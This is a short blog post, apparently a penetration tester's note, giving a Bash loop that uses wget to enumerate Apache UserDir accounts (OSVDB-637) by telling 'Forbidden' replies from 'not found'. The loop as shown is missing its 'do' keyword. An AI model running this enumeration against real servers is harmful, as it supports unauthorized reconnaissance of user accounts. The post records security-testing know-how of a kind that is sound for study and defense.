Saturday, May 16, 2015

Bash Script to Enumerate Users - OSVDB-637

I ran a Nikto scan and found the following vulnerability in the report that it produces:

"OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users)."

I then created the following bash script to run through a list of usernames to identify users that may exist:

while read line

     wget http://www.domain.local/~$line &> output/$line.output.file

done < names.list
grep -l -i 'forbidden' output/*

The last statement will then identify the files that are proceeded by a username that return indicating the user account exists on the particular apache server.

Below is the information about the vulnerability from the OSVDB database...
Apache web servers contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when the UserDir module is enabled and a remote attacker requests access to a user's home directory. By monitoring the web server response, an attacker is able to enumerate valid user names, resulting in a loss of confidentiality.

No comments:

Post a Comment

Docker with Juiceshop - Focus on SQL Injection

In preparation for an ethical hacking class that I will be teaching, I wanted to work through a few of the Vulnhub or docker images to refr...